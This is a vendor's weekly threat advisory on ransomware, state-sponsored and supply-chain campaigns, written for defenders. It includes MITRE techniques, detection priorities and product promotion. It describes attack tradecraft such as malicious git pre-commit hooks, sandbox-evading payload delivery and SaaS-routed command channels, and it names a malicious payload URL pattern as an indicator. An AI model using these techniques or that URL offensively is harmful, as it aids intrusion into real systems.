3 Things Security Leaders Should Care About This Week

1. A new ransomware crew is now fully operational, and the full intrusion chain has been documented. “The Gentlemen” runs an end-to-end campaign anchored in edge appliance exploitation and Microsoft 365 credential theft, with a confirmed $190,000 ransom already paid. Every stage of the chain abuses legitimate enterprise tooling. If your SOC playbooks only fire at the encryption stage, the operator has already been resident through four prior stages.

2. A critical cPanel and WHM vulnerability is being scanned globally, with exploitation expected within the fortnight. CVE-2026-41940 (CVSS 9.8) lets unauthenticated attackers take administrative control of cPanel-based hosting. Mass scanning is happening now. If your customer-facing services, marketing sites, or hosted infrastructure run on cPanel, this is the patch decision of the week.

3. State-sponsored activity is at its highest density of the quarter. Five distinct nation-state attributions surfaced in seven days — Iran, Belarus, China-nexus (×2), and North Korea — with multiple campaigns engineered specifically to defeat sandbox-based analysis. Detection workflows that depend on sandbox verdicts to elevate static indicators are arriving at confirmed APT compromises weeks late.

Where the Week’s Activity Concentrates

This week’s threat landscape produced 567 indicators across 35 new adversaries — a deliberately deduplicated snapshot of activity that did not appear in last week’s reporting. The operationally important signal clusters into three patterns:

• 🔴 ACT THIS WEEK — The Gentlemen full intrusion chain is now public. Operator-side intelligence leak plus defender-side incident-response forensics give us EtherRAT → TukTuk C2 → commercial RMM hands-on-keyboard → ransomware. Sequence-aware detection across the chain is the only response that catches it before the impact stage.
• 🔴 ACT THIS WEEK — CVE-2026-41940 mass scanning is live. 51 scanner indicators are enumerating exposed cPanel and WHM installations. Patching window is measured in days.
• Five state-sponsored attributions in seven days: Seedworm (Iran), FrostyNeighbor (Belarus), FamousSparrow and TencShell (China-nexus), Lazarus (DPRK). FrostyNeighbor’s server-side validation tradecraft specifically defeats sandbox pipelines and demands a sandbox-independent IOC handling policy.

Below is the adversary breakdown with our threat advisory lens applied: what each threat looks like in customer telemetry, where reactive SOC workflows typically lose time, and what AiStrike automates so your team isn’t the one losing it.

The underlying threat intelligence in this brief is produced in partnership with HACKFORLAB’s research team. The threat advisory analysis, coverage priorities, and platform context are AiStrike’s own.

This Week in Numbers

• ‍567 IOCs indexed across 4 indicator types — Hashes lead at 294, Domains at 160, URLs at 75, IPs at 38.‍
• 35 distinct adversaries active this week, all new — none appeared in last week’s reporting.‍
• Severity skew is sharp: 498 IOCs (88%) carry a High severity rating; 65 are Low (predominantly CVE-2026-41940 scanner reconnaissance); 4 are Medium.‍
• By category: Malware leads at 310 IOCs · Malware campaigns at 102 · Threat actors at 53 · Scanner activity at 51 · Ransomware at 33 · Phishing at 14 · C2 at 4.‍
• State-sponsored fingerprint: Four clusters — FrostyNeighbor, Seedworm, Lazarus, FamousSparrow — score at confidence 97 on robust external attribution. The single densest week of state-actor activity this quarter.

🔴 Featured Adversary: The Gentlemen — Ransomware-as-a-Service

33 IOCs · High Severity · Confidence 90 · ACT THIS WEEK

A professionalised RaaS crew whose operator-side “Rocket” backend database was leaked, exposing nine internal accounts including the lead operator (handle zeta88). Confirmed ransom of $190,000 USD against an opening anchor of $250,000. Initial access spans Fortinet and Cisco edge appliance exploitation, NTLM relay, and Microsoft 365 credential harvesting. The full intrusion chain — corroborated by incident-response forensics — runs EtherRAT implant → TukTuk C2 over SaaS and blockchain → commercial RMM hands-on-keyboard → ransomware encryption. MITRE TTPs: T1190, T1187, T1078, T1098, T1486, T1657, T1659.

Where reactive workflows fall short. Every stage of this chain abuses legitimate enterprise tooling — edge appliances treated as managed infrastructure with limited telemetry, SaaS-routed C2 on the allow-list, commercial RMM that looks identical to legitimate IT activity. By the time ransomware fires the alert, the operator has been resident through the full kill chain. Traditional playbooks engineered for impact-stage response arrive at the end of the story.

The AiStrike threat advisory lens. The Gentlemen is fundamentally a sequence problem. AiStrike correlates the chain — edge appliance auth anomalies, then unsigned MSI execution, then outbound to fresh SaaS endpoints, then commercial RMM activity from an identity that doesn’t normally invoke it — and elevates the sequence before encryption begins. The 33 ransomware IOCs and 35 EtherRAT IOCs are useful inputs, but customer protection is anchored in behavioral chain detection, not the indicator list. The operational question this week isn’t “do we have the IOCs”; it’s “have we baselined per-identity RMM behavior so the chain registers as a deviation.”

🔴 Featured Adversary: FrostyNeighbor — Belarus-Aligned Espionage

21 IOCs · High Severity · Confidence 97 · SANDBOX-INDEPENDENT

Belarus state-aligned threat actor with fresh activity (March 2026) against Ukrainian government targets. The distinguishing tradecraft is server-side victim validation: before delivering the final payload, FrostyNeighbor’s infrastructure validates the victim’s environment from the server side. Sandboxes and research VMs get a benign decoy. Real victims get the real payload. This single design choice defeats sandbox-based analysis pipelines almost categorically. MITRE TTPs: T1566.001, T1059.001, T1105, T1027, T1480, T1102.002, T1071.001.

Where reactive workflows fall short. Sandbox-centric workflows fail loudest here. An analyst submits the lure, the sandbox detonates the first stage, the server returns the benign decoy, the sandbox verdict comes back clean. The IOC pipeline marks the indicator low-priority. The actual victim — whose environment matched the server-side validation criteria — gets the real implant. Mean time to discovery on FrostyNeighbor intrusions, in sandbox-dependent environments, is measured in weeks.

The AiStrike threat advisory lens. Treat the static indicators as authoritative regardless of sandbox verdict. AiStrike ingests the 13 FrostyNeighbor file-hash artifacts as confidence-97 triggers — they fire on hash match alone, with investigation context auto-assembled around the match. The platform does not require sandbox corroboration to elevate, because the threat class is specifically engineered to produce a clean sandbox verdict. For confidence-97 state-actor clusters with documented server-side validation tradecraft, our default inverts the usual SOC logic: hash match elevates immediately, and the sandbox result becomes supporting evidence, not gating evidence.

Featured Adversary: Seedworm — Iran-Linked Q1 2026 Espionage

20 IOCs · High Severity · Confidence 97

MOIS-affiliated Iranian APT operating across nine organisations on four continents in Q1 2026, including a near-week-long intrusion at a South Korean electronics manufacturer. The tradecraft signature is DLL sideloading with legitimately signed binaries from Fortemedia and major enterprise endpoint-security vendors. Implant chain runs through node.exe with PowerShell modules for reconnaissance, screenshot capture, SAM hive theft, and SOCKS5 reverse-proxy tunnelling. MITRE TTPs: T1574.002, T1059.001, T1056.001, T1113, T1003.002, T1547.001, T1572, T1090.001.

Where reactive workflows fall short. Legitimately signed binaries don’t fire signature-trust controls. Sideloaded malicious DLLs inherit the signing context for most policy decisions. Each individual signal sits below most SOC alert thresholds. The intrusion only surfaces — if it surfaces — when the cumulative pattern crosses a threshold that traditional alerting was never designed to measure.

The AiStrike threat advisory lens. The signal is the combination: signed-binary sideload pattern, plus PowerShell module execution from a node.exe parent, plus a SOCKS5 listener on an unexpected port, plus SAM hive access from an identity that doesn’t normally touch credential storage. AiStrike treats these as a single investigation thread, not as four separate medium-severity findings stacked in a queue. For confidence-97 state-actor clusters, the platform elevates within minutes of the cumulative pattern reaching threshold — typically while only the first two or three signals have fired, well before SAM hive theft completes.

Featured Adversary: Lazarus — DPRK “Contagious Interview” via Git Hooks

5 IOCs · High Severity · Confidence 97

The DPRK “Contagious Interview” campaign continues, with a novel execution technique. Developers approached through fake job interviews clone a GitHub repository as a “coding test.” Hidden inside: a malicious .git/hooks/pre-commit script that executes on first commit, abusing the trust the developer has already extended to the cloned repository. Infrastructure includes precommit.vercel.app/settings/{mac|linux|windows}?flag=5 — multi-platform from the first request. MITRE TTPs: T1566.003, T1195.001, T1546.004, T1059.004, T1567.

Where reactive workflows fall short. Developer endpoints are typically the least-controlled population in any enterprise. Code editors, terminals, and Git operations involve constant execution of external code, and most EDR policies are explicitly tuned to not alert on this activity. A pre-commit hook firing on first commit looks identical to a thousand legitimate developer-tooling actions per day. By the time downstream indicators surface, the developer’s credentials, signing keys, and source-code access are already in DPRK hands.

The AiStrike threat advisory lens. IOC-based coverage works here, because the hosted infrastructure is unusual enough to alert on with high precision — AiStrike fires on the precommit.vercel.app/settings/* URL pattern directly. But the more durable layer is behavioral: outbound to a fresh Vercel subdomain from a developer endpoint within minutes of a git clone, plus multi-platform payload requests in sequence. IOCs rotate in weeks; the developer-workflow behavioral pattern does not. Both layers ship.

Featured Adversary: Coruna — iOS Exploitation via Cryptocurrency Lures

99 IOCs · High Severity · Confidence 85

Palo Alto Unit 42-documented campaign delivering Coruna and DarkSword exploits to iOS users via fake cryptocurrency-reward pages. 93 of 99 indicators are domain infrastructure — heavily domain-driven. The lure consistently targets crypto wallet holders with “claim your reward” social engineering. MITRE TTPs: T1566.002, T1204.001, T1583.008, T1190, T1071.001.

Where reactive workflows fall short. Mobile threats sit in the blind spot of most enterprise SOC tooling. MDM platforms see device posture but not browser-level lure traffic. Network DNS resolvers see lookalike domain resolution but aren’t typically correlated against active mobile campaign intelligence. The result: 99 high-confidence indicators sit in a feed somewhere, and the first the SOC hears about a hit is when an employee reports a wallet drain — at which point the indicators are weeks old and the campaign infrastructure has rotated.

The AiStrike threat advisory lens. This is one of the rare attack classes where IOC-based detection works well — provided the IOCs reach the right enforcement points within hours, not days. AiStrike pushes Coruna domain infrastructure into enterprise mobile-management blocklists and corporate DNS recursive resolvers as a single coordinated update, mapped against the active campaign profile rather than as a flat IOC list. The timing is what we automate.

Featured Adversary: TencShell — Suspected China-Linked Custom Implant

55 IOCs · High Severity · Confidence 85

Cato CTRL-disclosed Go-based implant derived from the open-source Rshell C2 framework, identified in a global manufacturer’s network. Intrusion chain uses a first-stage dropper, Donut shellcode, a masqueraded .woff web-font resource, memory injection, and web-like C2. Attribution to a Chinese state-linked operator is assessed at moderate confidence. MITRE TTPs: T1105, T1055, T1620, T1036.008, T1071.001, T1027.

Where reactive workflows fall short. A .woff file masquerading as a web-font asset is exactly what perimeter and EDR tooling are trained not to alert on. The only signal is behavioral — the surrounding process spawning the load, the in-memory execution that follows, the outbound C2 that doesn’t quite look like normal web traffic. IOC-centric workflows are structurally late because the entry point doesn’t look like one.

The AiStrike threat advisory lens. AiStrike anchors detection on the behavior, not the masquerade: in-memory execution from an unsigned process region (T1620), web-traffic C2 patterns that deviate from the parent application’s normal outbound profile, parent-child relationships that don’t match the baselined behavior. The 51 file hashes in this week’s feed are useful breadcrumbs, but TencShell hashes rotate. The behavioral signature of reflective code loading from a font-file resource survives the rotation.

Featured Adversary: Hologram — Modular Implant with Hookdeck C2

47 IOCs · High Severity · Confidence 85

Six-binary modular implant framework delivered as a fake OpenClaw installer. The operationally distinctive element is the C2 transport chain: Hologram routes command-and-control through Azure DevOps, Telegram, and Hookdeck — three legitimate services inside virtually every enterprise allow-list. First documented use of clroxide in crimeware. Multiple infection waves have rotated infrastructure during disclosure. MITRE TTPs: T1204.002, T1036.005, T1102, T1027, T1055, T1105, T1071.001.

Where reactive workflows fall short. Hookdeck, Azure DevOps, and Telegram are services legitimate engineering and DevOps teams use daily. Blocking them isn’t an option; allow-listing them isn’t sufficient. The only meaningful detection signal is what the identity is doing on those services — and most SOC tooling doesn’t maintain per-identity, per-API baselines for legitimate SaaS platforms. The campaign is engineered around the gap between “this service is permitted” and “this identity should be using this service this way.”

The AiStrike threat advisory lens. AiStrike baselines identity behavior across legitimate SaaS surfaces continuously, and elevates sessions where API call patterns deviate from the identity’s role — even when every individual call is to a permitted service. For Hologram specifically, the signature isn’t “calls to Hookdeck”; it’s “calls to Hookdeck from an identity that has never used Hookdeck before, immediately following execution of a masqueraded MSI installer.”

Continuity from last week: This is the same detection chassis AiStrike applies to UAT-8302’s cloud-API C2 (Microsoft Graph, Yandex Cloud, GitHub) covered in the May 4–10 advisory. The pattern — APT C2 routed through legitimately allow-listed SaaS — is now the dominant tradecraft signature across two consecutive weeks. Per-identity, per-API baselining is no longer a forward-looking capability; it’s the current minimum.

Featured Adversary: Kong RAT — SEO-Poisoning Remote Access Trojan

41 IOCs · High Severity · Confidence 85

Long-running campaign (active May 2025 through March 2026) poisoning search results for FinalShell, Xshell, QuickQ VPN, Clash, and LeTV-related VPN tools, targeted at Chinese-speaking technical users. Sustained, precise targeting against developers and IT administrators. MITRE TTPs: T1608.006, T1189, T1204.002, T1036.005, T1105, T1071.001, T1567.

Where reactive workflows fall short. SEO poisoning operates upstream of every enterprise security control. The first telemetry an enterprise sees is the trojanised installer executing on a developer endpoint — at which point the question is no longer prevention but containment, and the malicious software has already been installed by the user with their full consent.

The AiStrike threat advisory lens. AiStrike treats SEO-poisoning as a behavioral signature, not an indicator chase. The 9 Kong RAT domains push to corporate DNS resolvers and MDM policy enforcement, but the durable detection layer is behavioral: a developer endpoint downloading an installer from a domain registered within the last 90 days, with the binary writing to non-standard paths and spawning outbound to fresh infrastructure. Long-running campaigns like Kong RAT don’t require continuous IOC refresh to maintain coverage.

Supply-Chain Pressure: Four Independent Disclosures in One Week

Four supply-chain compromises landed in this week’s window. The cumulative pattern is operationally more significant than any single campaign and warrants its own advisory lens.

• ‍Open-OSS/privacy-filter (Hugging Face): Typosquatted OpenAI’s Privacy Filter, copied the model card verbatim, reached 200,000 downloads. Shipped a loader.py that fetched infostealer malware on Windows.
• ‍JDownloader CMS compromise: Attackers exploited an unpatched CMS vulnerability to redirect download links to malicious files containing a Python RAT. Window: 6–7 May 2026.
• ‍TeamPCP / Checkmarx Jenkins plugin: Same actor responsible for the Checkmarx GitHub Actions and OpenVSX compromises earlier this year, now with a backdoored Checkmarx Jenkins plugin.
• ‍CNCF Antrea malicious PR: Threat actor opened a malicious pull request engineering CI poisoning to exfiltrate credentials. Rejected before merge — but the attempt itself signals an active campaign against CNCF projects.

Where reactive workflows fall short. Supply-chain compromise is where IOC-based detection fails most completely. The malicious code arrives signed (or signed-adjacent), from a trusted source, through sanctioned channels. No perimeter alert fires. Multi-ecosystem attacks in the same week compound the problem: most SOC tooling baselines one ecosystem at a time.

The AiStrike threat advisory lens. Per-application, per-identity behavioral baselining is the only approach that materially compresses the dwell window. For each of the four campaigns above, the signature isn’t the hashes (those rotate) or the source repository (those vary) — it’s the cross-ecosystem behavior of newly-installed packages: outbound to fresh infrastructure within minutes of install, child process spawns that don’t match the package’s stated purpose, credential-access patterns that deviate from baseline. AiStrike maintains those baselines continuously and surfaces deviation patterns mapped to known supply-chain TTPs.

MITRE ATT&CK Coverage Validation — This Week’s Priorities

The adversaries above concentrate around a tightly recurring set of ATT&CK techniques. If you only validate a limited subset this week, prioritize coverage for the following:

Coverage validation steps for the week:

1. Run an ATT&CK heat-map self-assessment against the table above. For each Critical or High technique, identify whether you have at least one alerting detection in your environment and at least one hunting query.
2. For the EtherRAT → TukTuk → The Gentlemen chain — validate that your detection can fire on the sequence, not just on individual techniques. The chain is the signal.
3. For T1195.001 + T1546.004 together — the Lazarus Git-hooks chain — confirm you have telemetry coverage on developer endpoints, including .git/hooks/* execution. Most enterprise EDR baselines do not.
4. For T1480 (FrostyNeighbor) — confirm your detection logic for high-confidence state-actor IOCs does not require sandbox corroboration.
5. For T1219 (RMM abuse) — confirm per-identity baselining for ScreenConnect, Atera, commercial RMM, and remote-monitoring tools. “Is this tool allowed” is the wrong question; “is this identity supposed to be invoking this tool” is the right one.

SOC Priorities This Week

The seven priorities below convert this week’s adversary data into platform-automated outcomes — across detection, hunting, and alert and vulnerability prioritization. If your SOC is running these as manual hunts, every one of them is a place where time-to-decision can be measurably compressed.

1. Sequence-aware detection for the EtherRAT → TukTuk → The Gentlemen chain. Impact-stage ransomware playbooks arrive at the end of the story. AiStrike correlates the full chain — edge appliance auth anomalies through MSI execution through SaaS-routed C2 through commercial RMM activity — and elevates the sequence before encryption begins.
2. Sandbox-independent IOC handling for server-side-validated APTs. FrostyNeighbor’s design defeats sandbox-based analysis categorically. For confidence-97 state-actor clusters with documented server-side validation tradecraft, AiStrike treats hash matches as authoritative triggers and sandbox results as supporting evidence, not gating evidence. The 13 FrostyNeighbor hashes are live across customer environments today.
3. Per-identity, per-API baselining for SaaS-routed C2. Hologram (Hookdeck, Azure DevOps, Telegram) is this week’s case; UAT-8302 was last week’s. The right question isn’t “is this service allowed” — it’s “is this identity supposed to be using this service this way.” AiStrike baselines this continuously across legitimate SaaS surfaces.
4. Developer-endpoint Git-hooks coverage for Lazarus tradecraft. Most enterprise EDR baselines are tuned to not alert on Git operations. The Lazarus Git-hooks technique exploits exactly that calibration gap. AiStrike deploys detection for .git/hooks/* execution patterns correlated with outbound to fresh infrastructure within minutes of clone, and treats precommit.vercel.app/settings/* as a confidence-97 indicator.
5. Cross-ecosystem supply-chain behavioral baselining. Four supply-chain compromises in one week — Hugging Face, JDownloader, Checkmarx Jenkins, CNCF Antrea — confirm this attack class is broadening across ecosystems faster than per-ecosystem detection can keep up. Per-application, per-identity behavioral baselines sustained across package managers, plugin marketplaces, and model repositories are one of the few approaches that materially shortens the dwell window.
6. Signed-binary sideload detection for Seedworm-class tradecraft. AiStrike detects the sideload pattern (signed parent + unsigned DLL load + behavioral deviation) directly, without requiring the malicious DLL to be flagged by reputation systems.
7. Real-time CVE-to-scanner correlation for CVE-2026-41940 and successors. Patching the perimeter isn’t a quarterly project; it’s a continuous reconciliation of “which devices are exposed, to which CVEs, being scanned by which active operator infrastructure this week.” For CVE-2026-41940, AiStrike cross-references the 51 scanner indicators against your inbound telemetry, so the patching queue reflects observed reconnaissance, not vulnerability inventory.

See This in Production at Gartner SRM 2026

If The Gentlemen full-chain detection, FrostyNeighbor sandbox-independent IOC handling, or cross-ecosystem supply-chain baselining are familiar problems in your environment, we’ll be walking through all three in production telemetry at Gartner Security & Risk Management Summit 2026 — Booth #453, June 1–3, National Harbor, MD.

Live demos focus on the operational moments this brief describes: the sequence-aware elevation that catches the Gentlemen chain before encryption, the static-IOC authoritative trigger logic for server-side-validated APTs, and the per-identity SaaS baselining that detects Hologram-class C2 routed through legitimate enterprise services.

Book a meeting at Gartner SRM 2026 →

The AiStrike Threat Advisory publishes weekly. Subscribe for next week’s coverage validation priorities, ATT&CK technique deep-dives, and platform-automated detection outcomes.

AiStrike delivers AI-native, preemptive cyber defense — turning reactive SOCs into proactive ones through agentic investigation, continuous detection optimization, and automated response. Customers see 50% lower SOC costs and 90% fewer false positives.

Threat intelligence partnership: HACKFORLAB. Threat advisory analysis: AiStrike Threat Operations.